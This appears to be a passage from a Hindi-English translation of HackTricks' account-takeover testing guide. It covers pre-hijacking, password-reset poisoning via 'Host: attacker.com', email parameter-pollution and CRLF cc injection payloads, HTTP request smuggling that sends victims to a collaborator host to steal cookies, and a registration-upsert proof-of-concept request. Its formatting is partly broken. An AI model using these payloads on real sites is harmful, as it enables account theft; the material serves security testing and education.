def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: एक ही वैध OTP को दो सत्रों में एक साथ सबमिट करें; कभी‑कभी एक सत्र verified attacker account बन जाता है जबकि victim का फ्लो भी सफल हो जाता है।
- Also test Host header poisoning on verification links (same as reset poisoning below) ताकि attacker‑controlled host पर verification को leak या पूरा किया जा सके।

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (victim के साइन अप करने से पहले)

एक शक्तिशाली क्लास की समस्याएँ तब होती हैं जब attacker victim के ईमेल पर उन_actions_ को perform करता है इससे पहले कि victim अपना account बनाये, और बाद में फिर access हासिल कर लेता है।

Key techniques to test (target के फ्लोज़ के अनुसार अनुकूलित करें):

- Classic–Federated Merge
- Attacker: victim email से एक classic account register करता है और password सेट करता है
- Victim: बाद में उसी email से SSO के जरिए साइन अप करता है
- Insecure merges दोनों पक्षों को logged in छोड़ सकते हैं या attacker की access को resurrect कर सकते हैं
- Unexpired Session Identifier
- Attacker: account बनाता है और एक long‑lived session रखता है (logout न करें)
- Victim: account recover/पासवर्ड सेट करता है और उसे उपयोग करता है
- टेस्ट करें कि क्या पुराने sessions reset या MFA enable करने के बाद भी valid रहते हैं
- Trojan Identifier
- Attacker: pre‑created account में एक secondary identifier जोड़ता है (phone, अतिरिक्त email, या attacker का IdP लिंक)
- Victim: password reset करता/करती है; बाद में attacker उस trojan identifier का उपयोग करके reset/login कर लेता है
- Unexpired Email Change
- Attacker: email‑change attacker के मेल पर initiate करता है और confirmation रोक देता है
- Victim: account recover करता/करती है और उसे उपयोग करना शुरू कर देता/देती है
- Attacker: बाद में pending email‑change complete करके account चुरा लेता है
- Non‑Verifying IdP
- Attacker: ऐसा IdP उपयोग करता है जो email ownership verify नहीं करता और `victim@…` assert कर देता है
- Victim: classic route से साइन अप करता/करती है
- Service बिना `email_verified` चेक किए या local verification किए email पर merge कर देता है

Practical tips

- web/mobile bundles से flows और endpoints harvest करें। classic signup, SSO linking, email/phone change, और password reset endpoints देखें।
- अन्य फ्लोज़ पर काम करते समय sessions को जीवित रखने के लिए realistic automation बनाएं।
- SSO tests के लिए, एक test OIDC provider उठाएँ और victim address के लिए `email` claims वाले token जारी करें तथा `email_verified=false` सेट करके जांचें कि RP unverified IdPs पर भरोसा करता है या नहीं।
- किसी भी password reset या email change के बाद सत्यापित करें कि:
  - all other sessions और tokens invalidated हैं,
  - pending email/phone change क्षमताएँ रद्द कर दी गयी हैं,
  - पहले linked IdPs/emails/phones फिर से verify किये गये हैं।

Note: इन तकनीकों की विस्तृत methodology और केस स्टडीज़ Microsoft की pre‑hijacking research में document की गयी हैं (References अंत में देखें)।

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. अपना email address पर password reset request करें
2. password reset link पर क्लिक करें
3. पासवर्ड बदलें नहीं
4. किसी भी 3rd party website(eg: Facebook, twitter) पर क्लिक करें
5. Burp Suite proxy में request intercept करें
6. जांचें कि referer header password reset token को leak कर रहा है या नहीं।

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Burp Suite में password reset request intercept करें
2. Burp Suite में निम्न headers जोड़ें या edit करें : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. modified header के साथ request forward करें\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. host header पर आधारित password reset URL खोजें, जैसे : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

1. Attacker को अपने अकाउंट से login करना होगा और Change password फीचर पर जाना होगा।
2. Burp Suite शुरू करें और request को Intercept करें
3. उसे repeater tab में भेजें और parameters edit करें : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

The password reset token को हर बार randomly generate और unique होना चाहिए।
जाँच करें कि token expire होता है या हमेशा एक जैसा रहता है — कुछ मामलों में generation algorithm weak होता है और अनुमान लगाया जा सकता है। निम्नलिखित variables algorithm में उपयोग किए जा सकते हैं।

• Timestamp
• UserID
• Email of User
• Firstname and Lastname
• Date of Birth
• Cryptography
• Number only
• Small token sequence ( characters between [A-Z,a-z,0-9])
• Token reuse
• Token expiration date

Leaking Password Reset Token

1. किसी specific email के लिए API/UI का उपयोग करके password reset request trigger करें, उदाहरण: test@mail.com
2. server response को inspect करें और resetToken के लिए चेक करें
3. फिर उस token का उपयोग किसी URL में करें जैसे https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

1. सिस्टम पर ऐसे username से register करें जो victim के username के समान हो, पर username के पहले और/या बाद में white spaces डालें। उदाहरण: "admin "
2. अपने malicious username के साथ password reset request करें।
3. अपने email पर भेजे गए token का उपयोग करें और victim का password reset कर दें।
4. नए password के साथ victim के account में login करें।

The platform CTFd was vulnerable to this attack.
See: CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. application या किसी subdomain में XSS ढूंढें अगर cookies parent domain पर scope की गई हों : *.domain.com
2. current sessions cookie को leak करें
3. cookie का उपयोग कर user के रूप में authenticate करें

Account Takeover Via HTTP Request Smuggling

1. HTTP Request Smuggling (CL, TE, CL.TE) के प्रकार का पता लगाने के लिए smuggler का उपयोग करें
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. एक ऐसा request बनायें जो POST / HTTP/1.1 को निम्नलिखित data से overwrite कर दे:
   GET http://something.burpcollaborator.net HTTP/1.1 X: — लक्ष्य victims को burpcollab पर open redirect कर के उनकी cookies चुराना है\
3. अंतिम request कुछ इस प्रकार दिख सकता है

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone ने इस बग के exploiting की रिपोर्ट की\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

CSRF के माध्यम से खाता अधिग्रहण

1. CSRF के लिए एक payload बनाएं, उदाहरण: “HTML form with auto submit for a password change”
2. payload भेजें

JWT के माध्यम से खाता अधिग्रहण

JSON Web Token का उपयोग किसी उपयोगकर्ता को authenticate करने के लिए किया जा सकता है।

• JWT को किसी अन्य User ID / Email के साथ संपादित करें
• कमजोर JWT signature के लिए जाँच करें

JWT Vulnerabilities (Json Web Tokens)

रजिस्ट्रेशन-को-रीसेट (Upsert on Existing Email)

कुछ signup handlers उस स्थिति में upsert करते हैं जब दिया गया email पहले से मौजूद हो। अगर endpoint एक न्यूनतम body (जिसमें केवल email और password हो) स्वीकार करता है और ownership verification लागू नहीं करता, तो victim का email भेजने से उनके password को pre-auth तरीके से overwrite किया जा सकता है।

• खोज: bundled JS (या mobile app traffic) से endpoint नाम इकट्ठा करें, फिर ffuf/dirsearch का उपयोग करके /parents/application/v4/admin/FUZZ जैसे base paths को fuzz करें।
• Method hints: एक GET जो “Only POST request is allowed.” जैसा संदेश लौटाए, अक्सर सही verb और JSON body की अपेक्षा होने का संकेत देता है।
• वास्तविक दुनिया में देखी गई न्यूनतम body:

{"email":"victim@example.com","password":"New@12345"}

उदाहरण PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

प्रभाव: Full Account Takeover (ATO) बिना किसी reset token, OTP, या email verification के।

संदर्भ

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

• सदस्यता योजनाओं की जांच करें!
• हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
• हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।